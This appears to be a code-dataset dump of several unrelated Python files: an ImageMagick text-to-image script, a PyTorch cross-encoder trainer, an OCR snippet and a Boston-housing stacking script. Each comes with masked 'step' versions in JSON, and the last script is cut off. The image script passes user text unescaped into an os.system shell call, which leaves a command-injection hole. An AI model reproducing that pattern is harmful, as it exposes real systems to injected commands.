'-font Dejavu-Sans-Bold -pointsize {0} -gravity center -stroke none '
'-fill white -annotate 0 "{1}" -size 1920x1080 "{2}.png"'
)
def makeimage(text, point_size=100, width=30):
tw = textwrap.TextWrapper(width=width)
text = "\n".join(
a.replace("\\n", "\n") for a in tw.wrap(text)
)
filename = "".join(
c
for c in text.replace(" ", "-")
if c.isalpha() or c.isdigit() or c in ["-", "_"]
)
os.system(COMMAND.format(point_size, text, filename))
def main():
text = None
if len(sys.argv) > 1:
pt = int(sys.argv[1])
width = int(-0.3 * float(sys.argv[1]) + 60)
if width < 10:
print("Too large.")
sys.exit(2)
if len(sys.argv) > 2:
text = " ".join(sys.argv[2:])
else:
pt = 100
width = 30
if not text:
text = input("Text: ")
makeimage(text, pt, width)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "a486ec6b27a6b84e454a1bed096be9fe22d91612",
"index": 1561,
"step-1": "<mask token>\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = '\\n'.join(a.replace('\\\\n', '\\n') for a in tw.wrap(text))\n filename = ''.join(c for c in text.replace(' ', '-') if c.isalpha() or\n c.isdigit() or c in ['-', '_'])\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n if width < 10:\n print('Too large.')\n sys.exit(2)\n if len(sys.argv) > 2:\n text = ' '.join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n if not text:\n text = input('Text: ')\n makeimage(text, pt, width)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = '\\n'.join(a.replace('\\\\n', '\\n') for a in tw.wrap(text))\n filename = ''.join(c for c in text.replace(' ', '-') if c.isalpha() or\n c.isdigit() or c in ['-', '_'])\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n if width < 10:\n print('Too large.')\n sys.exit(2)\n if len(sys.argv) > 2:\n text = ' '.join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n if not text:\n text = input('Text: ')\n makeimage(text, pt, width)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nCOMMAND = (\n 'convert -size 1920x1080 canvas:\"rgb(149, 1, 1)\" -font Dejavu-Sans-Bold -pointsize {0} -gravity center -stroke none -fill white -annotate 0 \"{1}\" -size 1920x1080 \"{2}.png\"'\n )\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = '\\n'.join(a.replace('\\\\n', '\\n') for a in tw.wrap(text))\n filename = ''.join(c for c in text.replace(' ', '-') if c.isalpha() or\n c.isdigit() or c in ['-', '_'])\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n if width < 10:\n print('Too large.')\n sys.exit(2)\n if len(sys.argv) > 2:\n text = ' '.join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n if not text:\n text = input('Text: ')\n makeimage(text, pt, width)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os\nimport sys\nimport textwrap\nCOMMAND = (\n 'convert -size 1920x1080 canvas:\"rgb(149, 1, 1)\" -font Dejavu-Sans-Bold -pointsize {0} -gravity center -stroke none -fill white -annotate 0 \"{1}\" -size 1920x1080 \"{2}.png\"'\n )\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = '\\n'.join(a.replace('\\\\n', '\\n') for a in tw.wrap(text))\n filename = ''.join(c for c in text.replace(' ', '-') if c.isalpha() or\n c.isdigit() or c in ['-', '_'])\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n if width < 10:\n print('Too large.')\n sys.exit(2)\n if len(sys.argv) > 2:\n text = ' '.join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n if not text:\n text = input('Text: ')\n makeimage(text, pt, width)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python2\nimport os\nimport sys\nimport textwrap\n\nCOMMAND = (\n 'convert -size 1920x1080 canvas:\"rgb(149, 1, 1)\" '\n '-font Dejavu-Sans-Bold -pointsize {0} -gravity center -stroke none '\n '-fill white -annotate 0 \"{1}\" -size 1920x1080 \"{2}.png\"'\n)\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = \"\\n\".join(\n a.replace(\"\\\\n\", \"\\n\") for a in tw.wrap(text)\n )\n\n filename = \"\".join(\n c\n for c in text.replace(\" \", \"-\")\n if c.isalpha() or c.isdigit() or c in [\"-\", \"_\"]\n )\n\n\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n\n if width < 10:\n print(\"Too large.\")\n sys.exit(2)\n\n if len(sys.argv) > 2:\n text = \" \".join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n\n if not text:\n text = input(\"Text: \")\n\n makeimage(text, pt, width)\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from torch.utils.data import IterableDataset, DataLoader
from torch import nn
from torch.nn import functional as F
from triplet_training_generator import get_train_test_apikeys, training_generator
from pathlib import Path
from transformers import AutoModel
import torch
from tqdm import tqdm
import pandas as pd
MEMMAP_DIRECTORY = Path("/media/data/tokenized_crawl")
BATCHES_PER_EPOCH = 8192
class DataGenerator(IterableDataset):
def __init__(self, memmap_directory, apikey_weighted_df):
super(DataGenerator, self).__init__()
self.data_generator = training_generator(memmap_directory, apikey_weighted_df)
def __iter__(self):
return self.data_generator
class CrossEncoderModel(torch.nn.Module):
def __init__(self):
super(CrossEncoderModel, self).__init__()
# We need to make sure this matches the model we tokenized for!
# self.bert = AutoModel.from_pretrained('distilbert-base-cased')
self.bert = AutoModel.from_pretrained('distilbert-base-cased')
self.hidden = nn.Linear(768, 512)
self.out = nn.Linear(512, 1)
# self.out = torch.nn.Linear(768, 768, bias=False)
def forward(self, tensor_in, sep_token_id=102):
positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)
positive_pairs[:, 256] = sep_token_id
negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)
negative_pairs[:, 256] = sep_token_id
positive_labels = torch.ones(len(positive_pairs), dtype=torch.float32, device=tensor_in.device)
negative_labels = torch.zeros_like(positive_labels)
labels = torch.cat([positive_labels, negative_labels])
inputs = torch.cat([positive_pairs, negative_pairs], dim=0)
assert len(labels) == inputs.shape[0]
out = self.bert(inputs)[0]
# out = out[:, 0, :] # CLS token
out = out.mean(dim=1, keepdims=False) # Mean pooling
out = F.gelu(self.hidden(out))
out = torch.squeeze(self.out(out))
loss = F.binary_cross_entropy_with_logits(out, labels)
return loss
def main():
batch_size = 16
batches_per_epoch = (2 ** 19) // batch_size
eval_batches_per_epoch = (2 ** 18) // batch_size
save_path = Path('model.save')
train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(MEMMAP_DIRECTORY)
debug_weighted_apikeys = pd.concat([train_weighted_apikeys, test_weighted_apikeys]).query('num_posts > 1000000')
train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)
train_loader = DataLoader(train_dataset, batch_size=batch_size, pin_memory=True, num_workers=1)
test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)
test_loader = DataLoader(test_dataset, batch_size=batch_size, pin_memory=True, num_workers=1)
model = CrossEncoderModel().cuda()
# Diverges or just outputs the same vector for all samples at higher LRs
model_params = model.parameters()
optimizer = torch.optim.Adam(model_params, lr=1e-4)
if save_path.is_file():
print("Loading state...")
checkpoint = torch.load(str(save_path))
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
start_epoch = checkpoint['epoch'] + 1
else:
start_epoch = 0
for epoch in range(start_epoch, 60):
with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:
bar.set_description(f"Epoch {epoch}")
bar_loss = 0.
model.train()
optimizer.zero_grad()
for i, batch in enumerate(train_loader):
batch = batch.cuda()
loss = model(batch)
loss.backward()
optimizer.step()
bar.update(1)
bar_loss = ((bar_loss * i) + float(loss.detach())) / (i + 1) # Rolling mean loss
bar.set_postfix_str(f"Loss: {bar_loss:.3f}")
if i == batches_per_epoch - 1:
break
with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:
bar.set_description(f"Eval epoch {epoch}")
bar_loss = 0.
model.eval()
with torch.no_grad():
for i, batch in enumerate(test_loader):
batch = batch.cuda()
loss = model(batch)
bar.update(1)
bar_loss = ((bar_loss * i) + float(loss.detach())) / (i + 1) # Rolling mean loss
bar.set_postfix_str(f"Loss: {bar_loss:.3f}")
if i == eval_batches_per_epoch - 1:
break
torch.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict()
}, str(save_path))
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "650f00dd9740d62546eb58724e6e5a74398b3e59",
"index": 2522,
"step-1": "<mask token>\n\n\nclass DataGenerator(IterableDataset):\n <mask token>\n <mask token>\n\n\nclass CrossEncoderModel(torch.nn.Module):\n\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.\n float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n out = out.mean(dim=1, keepdims=False)\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataGenerator(IterableDataset):\n\n def __init__(self, memmap_directory, apikey_weighted_df):\n super(DataGenerator, self).__init__()\n self.data_generator = training_generator(memmap_directory,\n apikey_weighted_df)\n\n def __iter__(self):\n return self.data_generator\n\n\nclass CrossEncoderModel(torch.nn.Module):\n\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.\n float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n out = out.mean(dim=1, keepdims=False)\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\ndef main():\n batch_size = 16\n batches_per_epoch = 2 ** 19 // batch_size\n eval_batches_per_epoch = 2 ** 18 // batch_size\n save_path = Path('model.save')\n train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(\n MEMMAP_DIRECTORY)\n debug_weighted_apikeys = pd.concat([train_weighted_apikeys,\n test_weighted_apikeys]).query('num_posts > 1000000')\n train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n train_loader = DataLoader(train_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n test_loader = DataLoader(test_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n model = CrossEncoderModel().cuda()\n model_params = model.parameters()\n optimizer = torch.optim.Adam(model_params, lr=0.0001)\n if save_path.is_file():\n print('Loading state...')\n checkpoint = torch.load(str(save_path))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n start_epoch = checkpoint['epoch'] + 1\n else:\n start_epoch = 0\n for epoch in range(start_epoch, 60):\n with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Epoch {epoch}')\n bar_loss = 0.0\n model.train()\n optimizer.zero_grad()\n for i, batch in enumerate(train_loader):\n batch = batch.cuda()\n loss = model(batch)\n loss.backward()\n optimizer.step()\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == batches_per_epoch - 1:\n break\n with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Eval epoch {epoch}')\n bar_loss = 0.0\n model.eval()\n with torch.no_grad():\n for i, batch in enumerate(test_loader):\n batch = batch.cuda()\n loss = model(batch)\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == eval_batches_per_epoch - 1:\n break\n torch.save({'epoch': epoch, 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()}, str(save_path))\n\n\n<mask token>\n",
"step-3": "<mask token>\nMEMMAP_DIRECTORY = Path('/media/data/tokenized_crawl')\nBATCHES_PER_EPOCH = 8192\n\n\nclass DataGenerator(IterableDataset):\n\n def __init__(self, memmap_directory, apikey_weighted_df):\n super(DataGenerator, self).__init__()\n self.data_generator = training_generator(memmap_directory,\n apikey_weighted_df)\n\n def __iter__(self):\n return self.data_generator\n\n\nclass CrossEncoderModel(torch.nn.Module):\n\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.\n float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n out = out.mean(dim=1, keepdims=False)\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\ndef main():\n batch_size = 16\n batches_per_epoch = 2 ** 19 // batch_size\n eval_batches_per_epoch = 2 ** 18 // batch_size\n save_path = Path('model.save')\n train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(\n MEMMAP_DIRECTORY)\n debug_weighted_apikeys = pd.concat([train_weighted_apikeys,\n test_weighted_apikeys]).query('num_posts > 1000000')\n train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n train_loader = DataLoader(train_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n test_loader = DataLoader(test_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n model = CrossEncoderModel().cuda()\n model_params = model.parameters()\n optimizer = torch.optim.Adam(model_params, lr=0.0001)\n if save_path.is_file():\n print('Loading state...')\n checkpoint = torch.load(str(save_path))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n start_epoch = checkpoint['epoch'] + 1\n else:\n start_epoch = 0\n for epoch in range(start_epoch, 60):\n with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Epoch {epoch}')\n bar_loss = 0.0\n model.train()\n optimizer.zero_grad()\n for i, batch in enumerate(train_loader):\n batch = batch.cuda()\n loss = model(batch)\n loss.backward()\n optimizer.step()\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == batches_per_epoch - 1:\n break\n with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Eval epoch {epoch}')\n bar_loss = 0.0\n model.eval()\n with torch.no_grad():\n for i, batch in enumerate(test_loader):\n batch = batch.cuda()\n loss = model(batch)\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == eval_batches_per_epoch - 1:\n break\n torch.save({'epoch': epoch, 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()}, str(save_path))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from torch.utils.data import IterableDataset, DataLoader\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom triplet_training_generator import get_train_test_apikeys, training_generator\nfrom pathlib import Path\nfrom transformers import AutoModel\nimport torch\nfrom tqdm import tqdm\nimport pandas as pd\nMEMMAP_DIRECTORY = Path('/media/data/tokenized_crawl')\nBATCHES_PER_EPOCH = 8192\n\n\nclass DataGenerator(IterableDataset):\n\n def __init__(self, memmap_directory, apikey_weighted_df):\n super(DataGenerator, self).__init__()\n self.data_generator = training_generator(memmap_directory,\n apikey_weighted_df)\n\n def __iter__(self):\n return self.data_generator\n\n\nclass CrossEncoderModel(torch.nn.Module):\n\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.\n float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n out = out.mean(dim=1, keepdims=False)\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\ndef main():\n batch_size = 16\n batches_per_epoch = 2 ** 19 // batch_size\n eval_batches_per_epoch = 2 ** 18 // batch_size\n save_path = Path('model.save')\n train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(\n MEMMAP_DIRECTORY)\n debug_weighted_apikeys = pd.concat([train_weighted_apikeys,\n test_weighted_apikeys]).query('num_posts > 1000000')\n train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n train_loader = DataLoader(train_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n test_loader = DataLoader(test_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n model = CrossEncoderModel().cuda()\n model_params = model.parameters()\n optimizer = torch.optim.Adam(model_params, lr=0.0001)\n if save_path.is_file():\n print('Loading state...')\n checkpoint = torch.load(str(save_path))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n start_epoch = checkpoint['epoch'] + 1\n else:\n start_epoch = 0\n for epoch in range(start_epoch, 60):\n with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Epoch {epoch}')\n bar_loss = 0.0\n model.train()\n optimizer.zero_grad()\n for i, batch in enumerate(train_loader):\n batch = batch.cuda()\n loss = model(batch)\n loss.backward()\n optimizer.step()\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == batches_per_epoch - 1:\n break\n with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Eval epoch {epoch}')\n bar_loss = 0.0\n model.eval()\n with torch.no_grad():\n for i, batch in enumerate(test_loader):\n batch = batch.cuda()\n loss = model(batch)\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == eval_batches_per_epoch - 1:\n break\n torch.save({'epoch': epoch, 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()}, str(save_path))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from torch.utils.data import IterableDataset, DataLoader\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom triplet_training_generator import get_train_test_apikeys, training_generator\nfrom pathlib import Path\nfrom transformers import AutoModel\nimport torch\nfrom tqdm import tqdm\nimport pandas as pd\n\nMEMMAP_DIRECTORY = Path(\"/media/data/tokenized_crawl\")\nBATCHES_PER_EPOCH = 8192\n\n\nclass DataGenerator(IterableDataset):\n def __init__(self, memmap_directory, apikey_weighted_df):\n super(DataGenerator, self).__init__()\n self.data_generator = training_generator(memmap_directory, apikey_weighted_df)\n\n def __iter__(self):\n return self.data_generator\n\n\nclass CrossEncoderModel(torch.nn.Module):\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n # We need to make sure this matches the model we tokenized for!\n # self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n # self.out = torch.nn.Linear(768, 768, bias=False)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n # out = out[:, 0, :] # CLS token\n out = out.mean(dim=1, keepdims=False) # Mean pooling\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\ndef main():\n batch_size = 16\n batches_per_epoch = (2 ** 19) // batch_size\n eval_batches_per_epoch = (2 ** 18) // batch_size\n save_path = Path('model.save')\n\n train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(MEMMAP_DIRECTORY)\n debug_weighted_apikeys = pd.concat([train_weighted_apikeys, test_weighted_apikeys]).query('num_posts > 1000000')\n train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n train_loader = DataLoader(train_dataset, batch_size=batch_size, pin_memory=True, num_workers=1)\n test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n test_loader = DataLoader(test_dataset, batch_size=batch_size, pin_memory=True, num_workers=1)\n\n model = CrossEncoderModel().cuda()\n # Diverges or just outputs the same vector for all samples at higher LRs\n model_params = model.parameters()\n optimizer = torch.optim.Adam(model_params, lr=1e-4)\n if save_path.is_file():\n print(\"Loading state...\")\n checkpoint = torch.load(str(save_path))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n start_epoch = checkpoint['epoch'] + 1\n else:\n start_epoch = 0\n for epoch in range(start_epoch, 60):\n with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f\"Epoch {epoch}\")\n bar_loss = 0.\n model.train()\n optimizer.zero_grad()\n for i, batch in enumerate(train_loader):\n batch = batch.cuda()\n loss = model(batch)\n loss.backward()\n optimizer.step()\n bar.update(1)\n bar_loss = ((bar_loss * i) + float(loss.detach())) / (i + 1) # Rolling mean loss\n bar.set_postfix_str(f\"Loss: {bar_loss:.3f}\")\n if i == batches_per_epoch - 1:\n break\n with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f\"Eval epoch {epoch}\")\n bar_loss = 0.\n model.eval()\n with torch.no_grad():\n for i, batch in enumerate(test_loader):\n batch = batch.cuda()\n loss = model(batch)\n bar.update(1)\n bar_loss = ((bar_loss * i) + float(loss.detach())) / (i + 1) # Rolling mean loss\n bar.set_postfix_str(f\"Loss: {bar_loss:.3f}\")\n if i == eval_batches_per_epoch - 1:\n break\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()\n }, str(save_path))\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
4,
7,
9,
10,
11
]
}
|
[
4,
7,
9,
10,
11
] |
""" OCR that converts images to text """
from pytesseract import image_to_string
from PIL import Image
print image_to_string(Image.open('/Users/williamliu/Desktop/Screen Shot 2014-09-27 at 11.45.34 PM.png'))
#print image_to_string(Image.open('/Users/williamliu/Desktop/Screen Shot 2014-09-27 at 11.45.34 PM.png'))
#print image_to_string(Image.open('test-european.jpg'), lang='fra')
|
normal
|
{
"blob_id": "91ac4a23573abcb0ab024830dbc1daebd91bd40d",
"index": 2355,
"step-1": "\"\"\" OCR that converts images to text \"\"\"\n\nfrom pytesseract import image_to_string\nfrom PIL import Image\n\nprint image_to_string(Image.open('/Users/williamliu/Desktop/Screen Shot 2014-09-27 at 11.45.34 PM.png'))\n\n#print image_to_string(Image.open('/Users/williamliu/Desktop/Screen Shot 2014-09-27 at 11.45.34 PM.png'))\n#print image_to_string(Image.open('test-european.jpg'), lang='fra')\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
# Title : STACK_BostonHousing.py
# Description : Stacking was the natural progression of our algorithms trial.
# In here, we'll use prediction from a number of models in order
# to improve accuracy as it add linearly independent data to our
# dataset. Here we also use voting ensembler, using the best es-
# timator three timers on the stack of second level models.
# We'll find CV scores of each model on train_test_split then
# stack the models on a 5-KFold of the data, finding final CV
# score. We'll also plot the comparative graph of Real Prices vs
# Predicted Prices
# Author : Neves4
# Outputs : Figure with one plot : 'Real Prices vs Predicted prices'
# Values : SVR CV Scores: 0.6798 (+/- 0.0895)
# XGB CV Scores: 0.8784 (+/- 0.0598)
# RF CV Scores: 0.8601 (+/- 0.0789)
# STACK CV Scores: 0.8809 (+/- 0.0864)
# License : MIT License
#==============================================================================
##### IMPORTING #####
import numpy as np
import xgboost as xgb
from sklearn import datasets
import seaborn as sns
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.linear_model import ElasticNet
from sklearn.ensemble import RandomForestRegressor
from sklearn.svm import SVR
from sklearn.model_selection import cross_val_score, train_test_split, KFold
from sklearn.metrics import r2_score
sns.set() # set seaborn style
##### DECLARING AND TRAINING #####
# Carregamento do dataset do boston, conversão para o framework pandas e como a
# nomenclatura não é automática, foi dado valor às colunas da tabela do pandas.
# Para verificar como estão os dados, chamar print(boston_pd.head())
boston = datasets.load_boston()
boston_pd = pd.DataFrame(boston.data)
boston_pd.columns = boston.feature_names
# É necessária então a divisão dos datasets, pelo método train_test_split. Para
# encontrar o tamanho de cada tensor que foi dividido, print(X_train.shape)
X, Y = boston_pd, boston.target
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.1,
random_state = 42)
# ##### 1ST LEVEL MODELS #####
# # ElasticNet - baseline model #0
# print("------- FITTING ElasticNet -------")
# en_mdl = ElasticNet(alpha = 5.2, l1_ratio = 0.5, random_state = 42)
# en_cv_scores = cross_val_score(en_mdl, X_train, Y_train, cv=5, scoring='r2')
# print(" DONE! CV Scores: {:.4f} (+/- {:.4f})" .format(en_cv_scores.mean(),\
# en_cv_scores.std() * 2))
# SVR - baseline model #1
print("------- FITTING SVR -------")
svr_mdl = SVR(kernel = 'linear', C = 0.11, epsilon = 0.011, gamma = 0.1)
svr_cv_scores = cross_val_score(svr_mdl, X_train, Y_train, cv=5, scoring='r2')
print(" DONE! CV Scores: {:.4f} (+/- {:.4f})" .format(svr_cv_scores.mean(),\
svr_cv_scores.std() * 2))
# XGBRegressor - baseline model #2
print("------- FITTING XGBRegressor -------")
xgb_mdl = xgb.XGBRegressor(learning_rate = 0.0503, n_estimators = 339,
